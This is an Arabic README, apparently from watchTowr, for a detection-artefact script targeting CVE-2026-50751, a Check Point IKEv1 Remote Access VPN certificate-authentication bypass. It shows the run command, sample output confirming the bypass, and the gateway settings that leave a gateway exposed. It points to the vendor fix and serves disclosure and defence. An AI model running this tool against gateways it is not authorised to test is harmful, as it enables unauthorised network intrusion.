
مولّد أدلة اكتشاف (Detection Artefact Generator) لتجاوز التحقق من الشهادة في بروتوكول IKEv1 لخدمة Check Point للوصول عن بُعد (Remote Access VPN).
https://github.com/user-attachments/assets/1280c545-364e-42d1-94ac-5b2cd850d14e
انظر مقالة مدونتنا للتفاصيل التقنية.
$ python3 watchTowr-vs-Check-Point-CVE-2026-50751.py -rh vpn.example.com -u watchtowr
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Check-Point-CVE-2026-50751.py
(*) Check Point IKEv1 Remote-Access VPN certificate-auth bypass Detection Artifact Generator
- McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-50751]
[#] CVE-2026-50751 Check Point IKEv1 Remote-Access certificate-auth bypass
[+] Self-signed cert (untrusted); signature will be invalid (no private key)
[#] Connecting via udp ...
[#] Authenticating as 'watchtowr' with the forged certificate + invalid signature...
[#] Decrypting...
[+] Gateway Internal IP: 172.31.255.128
[+] [BYPASSED] Gateway authenticated us as 'watchtowr'. CVE-2026-50751 certificate-authentication bypass confirmed.
يتطلب Python 3 وحزمة cryptography:
pip install cryptography
يقوم مولّد أدلة الاكتشاف من watchTowr بفحص ثغرة تجاوز المصادقة في Check Point Remote Access VPN / Mobile Access وإظهارها، وهي CVE-2026-50751 (CVSS 9.3, CWE-287). يمكن لمهاجم بعيد غير مصادَق إكمال تبادل المرحلة الأولى (phase-1) في بروتوكول IKEv1 القديم وتتم مصادقته كمستخدم وصول عن بُعد (Remote Access) مُزوَّد دون الحاجة إلى شهادة صالحة أو مفتاح خاص أو كلمة مرور. يعمل عبر كل من IKE (UDP 500/4500) ووضع الزائر في Check Point / SSL (TCP خام على المنفذ 443، TCPT).
تكون البوابة مكشوفة عندما تكون مهيأة لمسار IKEv1 القديم: السماح بعملاء الوصول عن بُعد القدامى، والسماح بـ IKEv1 (وليس IKEv2 فقط). ينطبق تجاوز التحقق من الشهادة على طرق مصادقة المستخدم Certificate وCertificate with enrollment وMixed؛ أما طريقة Legacy (اسم المستخدم/كلمة المرور) فلا يمكن تجاوزها.
يمكن العثور على المعالجة والتفاصيل الإضافية في نشرة Check Point والتصحيح السريع sk185033:
لأحدث الأبحاث الأمنية، تابع فريق مختبرات watchTowr.